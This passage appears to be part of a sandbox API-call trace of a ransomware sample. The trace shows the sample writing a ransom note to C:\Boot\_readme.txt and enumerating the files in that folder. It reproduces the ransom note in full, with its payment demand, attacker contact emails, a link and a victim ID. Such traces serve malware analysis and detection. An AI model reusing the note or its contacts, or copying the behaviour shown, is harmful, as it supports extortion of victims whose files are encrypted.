PathFindFileNameW (pszPath="") returned="" [0228.437] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.437] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.437] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.438] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.438] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0228.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.438] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0228.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7a060 [0228.438] lstrcpyW (in: lpString1=0x3b7a060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.438] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.439] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0228.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.439] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa664fe90, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xa664fe90, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xa61d9550, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0228.439] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33c65a0 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79168 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.440] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x33f0408 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79190 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79168 | out: hHeap=0x620000) returned 1 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.440] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x33ecb68 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79168 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791b8 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79190 | out: hHeap=0x620000) returned 1 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f0408 | out: hHeap=0x620000) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.440] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79190 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791e0 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79208 [0228.441] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x70df58 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791b8 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79168 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79230 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79258 [0228.441] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79208 [0228.441] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x33b8188 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791e0 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79190 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79280 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792a8 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792d0 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792f8 [0228.441] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.442] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79258 [0228.442] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3408dc8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79230 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79168 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791b8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79320 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79348 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79370 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79398 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b793c0 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b793e8 [0228.442] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.442] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79208 [0228.442] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792f8 [0228.443] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, 